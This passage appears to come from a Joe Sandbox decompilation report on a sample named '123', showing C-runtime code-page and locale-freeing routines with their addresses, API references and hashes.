					_v36 = E00910679(0x180, 1);
					E0090F884(_t205);
					_v40 = E00910679(0x101, 1);
					E0090F884(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E0090F884(_v52);
						E0090F884(_v32);
						E0090F884(_t237);
						E0090F884(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E009136B0(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E009136B0(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E009133C3(0xff, _t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E0090F884( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E0090F884( *(_t252 + 0x94) - 0x80);
											E0090F884( *(_t252 + 0x98) - 0x80);
											E0090F884( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E0090F884(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E00906480(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E00913213(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x0090b61c
0x0090b624
0x0090b62b
0x0090b630
0x0090b633
0x0090b636
0x0090b639
0x0090b63b
0x0090b63e
0x0090b644
0x0090b647
0x0090b64a
0x0090b64d
0x0090b652
0x0090ba35
0x0090ba37
0x0090ba39
0x0090ba39
0x0090ba3c
0x0090ba42
0x0090ba42
0x0090ba44
0x0090ba4a
0x0090ba50
0x0090ba5a
0x0090ba64
0x0090ba6b
0x0090ba79
0x0090ba79
0x0090b658
0x0090b65b
0x0090b660
0x0090b67e
0x0090b688
0x0090b68b
0x0090b69e
0x0090b6a1
0x0090b6ae
0x0090b6b1
0x0090b6b4
0x0090b6c6
0x0090b6c9
0x0090b6db
0x0090b6de
0x0090b6e3
0x0090b6e9
0x0090b9fe
0x0090ba01
0x0090ba09
0x0090ba0f
0x0090ba17
0x0090ba21
0x0090ba21
0x00000000
0x0090b6f8
0x0090b6f8
0x0090b6fd
0x00000000
0x0090b714
0x0090b714
0x0090b716
0x0090b716
0x0090b719
0x0090b71a
0x0090b730
0x00000000
0x00000000
0x0090b736
0x0090b73c
0x00000000
0x00000000
0x0090b742
0x0090b745
0x0090b74b
0x0090b7a1
0x0090b7a4
0x0090b7ae
0x0090b7c3
0x0090b7c7
0x0090b7cc
0x0090b7cf
0x0090b7d1
0x00000000
0x00000000
0x0090b7fa
0x0090b7ff
0x0090b802
0x0090b804
0x00000000
0x00000000
0x0090b81f
0x0090b825
0x0090b82a
0x0090b82f
0x00000000
0x00000000
0x0090b835
0x0090b83e
0x0090b844
0x0090b847
0x0090b84a
0x0090b84d
0x0090b850
0x0090b856
0x0090b859
0x0090b85c
0x0090b85f
0x0090b861
0x0090b867
0x0090b86a
0x0090b86c
0x0090b93c
0x0090b943
0x0090b944
0x0090b94f
0x0090b954
0x0090b95e
0x0090b960
0x0090b961
0x0090b963
0x0090b964
0x0090b96c
0x0090b96c
0x0090b96e
0x0090b970
0x0090b971
0x0090b97c
0x0090b981
0x0090b985
0x0090b993
0x0090b99e
0x0090b9a6
0x0090b9b4
0x0090b9bf
0x0090b9c4
0x0090b985
0x0090b9c7
0x0090b9ca
0x0090b9d0
0x0090b9d9
0x0090b9de
0x0090b9e7
0x0090b9f0
0x0090b9f9
0x0090ba22
0x0090ba25
0x0090ba2b
0x00000000
0x0090ba2b
0x0090b879
0x0090b8d2
0x0090b8d5
0x0090b8d8
0x00000000
0x00000000
0x0090b8da
0x0090b8dd
0x0090b8dd
0x0090b8e0
0x0090b8e2
0x00000000
0x00000000
0x0090b8e4
0x0090b8ea
0x0090b8ed
0x0090b8ef
0x0090b932
0x0090b932
0x0090b935
0x0090b938
0x00000000
0x00000000
0x00000000
0x0090b938
0x0090b8f7
0x0090b900
0x0090b902
0x0090b902
0x0090b904
0x0090b907
0x0090b90a
0x0090b90d
0x0090b90f
0x0090b914
0x0090b917
0x0090b91a
0x0090b91d
0x0090b91f
0x0090b924
0x0090b925
0x0090b925
0x0090b929
0x0090b92c
0x0090b92f
0x00000000
0x0090b92f
0x0090b93a
0x0090b93a
0x00000000
0x0090b93a
0x0090b882
0x0090b885
0x0090b892
0x0090b894
0x0090b899
0x0090b89c
0x0090b89f
0x0090b8a7
0x0090b8a9
0x0090b8b7
0x0090b8ba
0x0090b8bd
0x0090b8c0
0x0090b8c2
0x0090b8c5
0x0090b8c9
0x00000000
0x0090b8d0
0x0090b74d
0x0090b754
0x0090b76e
0x0090b771
0x0090b774
0x00000000
0x00000000
0x0090b776
0x0090b779
0x0090b779
0x0090b77c
0x0090b77e
0x00000000
0x00000000
0x0090b780
0x0090b786
0x0090b788
0x0090b797
0x0090b797
0x0090b79a
0x0090b79c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0090b78a
0x0090b78a
0x0090b78a
0x0090b78e
0x0090b793
0x0090b793
0x00000000
0x0090b78a
0x0090b79e
0x00000000
0x0090b79e
0x0090b764
0x0090b769
0x00000000
0x0090b769
0x0090b6fd
0x0090b6e9
0x0090b662
0x0090b663
0x0090b668
0x0090b66c
0x0090b66d
0x0090b66e
0x0090b673
0x0090b678
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 0090B68B
_free.LIBCMT ref: 0090B6A1
_free.LIBCMT ref: 0090B6B4
_free.LIBCMT ref: 0090B6C9
_free.LIBCMT ref: 0090B6DE
GetCPInfo.KERNEL32(?,?), ref: 0090B728

Part of subcall function 00913213: _free.LIBCMT ref: 0091327E

_free.LIBCMT ref: 0090B993
_free.LIBCMT ref: 0090B9A6
_free.LIBCMT ref: 0090B9B4
_free.LIBCMT ref: 0090B9BF
_free.LIBCMT ref: 0090BA01
_free.LIBCMT ref: 0090BA09
_free.LIBCMT ref: 0090BA0F
_free.LIBCMT ref: 0090BA17
_free.LIBCMT ref: 0090BA25

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 0616281945a6a1a96a2ef97dc998b88c3d73af48b620be50ab9fe7e85f9d2f80
Instruction ID: e07a60e7b4f7aadaca752205bc0ecb20efc366329bd0f6117e152ace47957e33
Opcode Fuzzy Hash: 0616281945a6a1a96a2ef97dc998b88c3d73af48b620be50ab9fe7e85f9d2f80
Instruction Fuzzy Hash: 51D1A172A007069FDB21CF78C881BEEBBF9FF48304F144129E995A7292D775A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009181B5 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E009181B5(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x92c120) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0090F884(_t46);
							E00917461( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0090F884(_t47);
							E00917915( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0090F884( *((intOrPtr*)(_t74 + 0x7c)));
						E0090F884( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0090F884( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0090F884( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0090F884( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0090F884( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00918326( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x92c290) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0090F884(_t31);
							E0090F884( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0090F884(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0090F884(_t74);
			}

0x009181bd
0x009181c1
0x009181c9
0x009181d2
0x009181d7
0x009181de
0x009181e6
0x009181ee
0x009181f9
0x009181ff
0x00918200
0x00918208
0x00918210
0x0091821b
0x00918221
0x00918225
0x00918230
0x00918236
0x009181d7
0x00918237
0x0091823f
0x00918252
0x00918265
0x00918273
0x0091827e
0x00918283
0x0091828c
0x00918294
0x00918295
0x0091829b
0x0091829e
0x009182a1
0x009182a8
0x009182aa
0x009182ae
0x009182b6
0x009182bd
0x009182c3
0x009182c4
0x009182c4
0x009182cb
0x009182cd
0x009182d2
0x009182da
0x009182df
0x009182e0
0x009182e0
0x009182e3
0x009182e6
0x009182e9
0x009182ec
0x009182ec
0x009182fc

APIs

___free_lconv_mon.LIBCMT ref: 009181F9

Part of subcall function 00917461: _free.LIBCMT ref: 0091747E
Part of subcall function 00917461: _free.LIBCMT ref: 00917490
Part of subcall function 00917461: _free.LIBCMT ref: 009174A2
Part of subcall function 00917461: _free.LIBCMT ref: 009174B4
Part of subcall function 00917461: _free.LIBCMT ref: 009174C6
Part of subcall function 00917461: _free.LIBCMT ref: 009174D8
Part of subcall function 00917461: _free.LIBCMT ref: 009174EA
Part of subcall function 00917461: _free.LIBCMT ref: 009174FC
Part of subcall function 00917461: _free.LIBCMT ref: 0091750E
Part of subcall function 00917461: _free.LIBCMT ref: 00917520
Part of subcall function 00917461: _free.LIBCMT ref: 00917532
Part of subcall function 00917461: _free.LIBCMT ref: 00917544
Part of subcall function 00917461: _free.LIBCMT ref: 00917556

_free.LIBCMT ref: 009181EE

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

_free.LIBCMT ref: 00918210
_free.LIBCMT ref: 00918225
_free.LIBCMT ref: 00918230
_free.LIBCMT ref: 00918252
_free.LIBCMT ref: 00918265
_free.LIBCMT ref: 00918273
_free.LIBCMT ref: 0091827E
_free.LIBCMT ref: 009182B6
_free.LIBCMT ref: 009182BD
_free.LIBCMT ref: 009182DA
_free.LIBCMT ref: 009182F2

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f33538c23b4a75b31e6e39586429021c2ade657c9b06f8540bd8e1e099d72467
Instruction ID: 2d6358792958a8e88f25252c494039bd7b6f3e5fd2692d5fdb4aae37064e8459
Opcode Fuzzy Hash: f33538c23b4a75b31e6e39586429021c2ade657c9b06f8540bd8e1e099d72467
Instruction Fuzzy Hash: B2317C32700A099FEB36AA78D845BDBB3E8AF45394F148839E466D6591DF30AD81D710

Uniqueness

Uniqueness Score: -1.00%

Function 0091755F Relevance: 18.4, APIs: 12, Instructions: 373
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0091755F(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				signed int _t106;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t126;
				signed int _t130;
				signed int _t134;
				signed int _t138;
				signed int _t142;
				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				intOrPtr _t234;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E00910679(1, 0x50);
					_v8 = _t235;
					E0090F884(0);
					if(_t235 != 0) {
						_t228 = E00910679(1, 4);
						_v12 = _t228;
						E0090F884(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x92c120, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E00910679(1, 4);
							_v16 = _t233;
							E0090F884(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E00913213(_t225);
								_t118 = E00913213(_t225,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E00913213(_t225,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E00913213(_t225,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E00913213(_t225,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E00913213(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E00913213(_t225);
								_t142 = E00913213(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E00913213(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E00913213(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E00913213(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E00913213(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E00913213(_t225);
								_t166 = E00913213(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E00913213(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E00913213(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E00913213(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E00913213(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E00913213(_t225);
								_t190 = E00913213(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E00913213(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00917461(_v8);
								E0090F884(_v8);
								E0090F884(_v12);
								E0090F884(_v16);
								goto L4;
							}
							E0090F884(_t235);
							E0090F884(_v12);
							L7:
							goto L4;
						}
						E0090F884(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x92c120;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E0090F884( *(_t209 + 0x88));
							E0090F884( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x0091755f
0x00917568
0x0091756f
0x00917572
0x00917575
0x0091757e
0x009175a0
0x009175a4
0x009175a7
0x009175b1
0x009175c4
0x009175c8
0x009175cb
0x009175d5
0x009175e7
0x00917879
0x0091787a
0x0091787c
0x00917884
0x00917888
0x0091788d
0x00917898
0x009178a4
0x009178b0
0x009178bc
0x009178c2
0x009178c6
0x009178c8
0x009178c8
0x00000000
0x009178c6
0x009175f6
0x009175fa
0x009175fd
0x00917607
0x0091761b
0x00917621
0x0091762e
0x00917645
0x0091765c
0x00917673
0x00917683
0x00917690
0x009176a7
0x009176be
0x009176d5
0x009176ef
0x00917706
0x0091771d
0x00917734
0x0091774e
0x00917765
0x0091777c
0x00917793
0x009177ad
0x009177c4
0x009177d1
0x009177d2
0x009177d4
0x009177db
0x009177f2
0x00917816
0x00917844
0x00917853
0x00917853
0x00917857
0x00000000
0x00000000
0x00917848
0x00917848
0x0091784e
0x0091785d
0x00917852
0x00917852
0x00000000
0x00917852
0x0091785f
0x00917861
0x00917861
0x00917864
0x00917866
0x00917869
0x00000000
0x0091786d
0x00917850
0x00000000
0x00917850
0x00000000
0x00917859
0x0091781c
0x00917822
0x0091782b
0x00917834
0x00000000
0x00917839
0x0091760a
0x00917613
0x009175dd
0x00000000
0x009175dd
0x009175d8
0x00000000
0x009175d8
0x009175b3
0x00000000
0x00917588
0x00917588
0x0091758a
0x0091758d
0x009178ca
0x009178ca
0x009178d2
0x009178d4
0x009178d4
0x009178dc
0x009178e1
0x009178e5
0x009178ed
0x009178f5
0x009178fb
0x009178e5
0x009178ff
0x00917904
0x0091790a
0x00000000
0x0091790a

APIs

_free.LIBCMT ref: 009175A7
_free.LIBCMT ref: 009175CB
_free.LIBCMT ref: 009175D8
_free.LIBCMT ref: 009175FD
_free.LIBCMT ref: 0091760A
_free.LIBCMT ref: 00917613
_free.LIBCMT ref: 009178ED
_free.LIBCMT ref: 009178F5

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c1a90028f6bc9405a3eb21ec6a93d8db64d6903c18ea2e7ba283fd9de553ae48
Instruction ID: 9be3c69572cd8362d2791f0f26f7229d1310e045d69c4f2d7ab2f9550e61d9ce
Opcode Fuzzy Hash: c1a90028f6bc9405a3eb21ec6a93d8db64d6903c18ea2e7ba283fd9de553ae48
Instruction Fuzzy Hash: 1CC13972E40209BFDB20DB98CD86FEEB7F99F48700F144565FA15FB282D6709A819760

Uniqueness

Uniqueness Score: -1.00%

Function 0090FAE4 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0090FAE4(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x91f510;
				if(_t68 != 0x91f510) {
					E0090F884(_t68);
					_t36 = _a4;
				}
				E0090F884( *((intOrPtr*)(_t36 + 0x3c)));
				E0090F884( *((intOrPtr*)(_a4 + 0x30)));
				E0090F884( *((intOrPtr*)(_a4 + 0x34)));
				E0090F884( *((intOrPtr*)(_a4 + 0x38)));
				E0090F884( *((intOrPtr*)(_a4 + 0x28)));
				E0090F884( *((intOrPtr*)(_a4 + 0x2c)));
				E0090F884( *((intOrPtr*)(_a4 + 0x40)));
				E0090F884( *((intOrPtr*)(_a4 + 0x44)));
				E0090F884( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0090F910(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0090F97B(_t67, _t72, _t73, _t77);
			}

0x0090fae4
0x0090fae4
0x0090fae4
0x0090fae9
0x0090faef
0x0090faf1
0x0090faf7
0x0090fafa
0x0090faff
0x0090fb02
0x0090fb06
0x0090fb11
0x0090fb1c
0x0090fb27
0x0090fb32
0x0090fb3d
0x0090fb48
0x0090fb53
0x0090fb61
0x0090fb6c
0x0090fb74
0x0090fb75
0x0090fb78
0x0090fb7e
0x0090fb82
0x0090fb86
0x0090fb87
0x0090fb91
0x0090fb97
0x0090fb98
0x0090fb9b
0x0090fba1
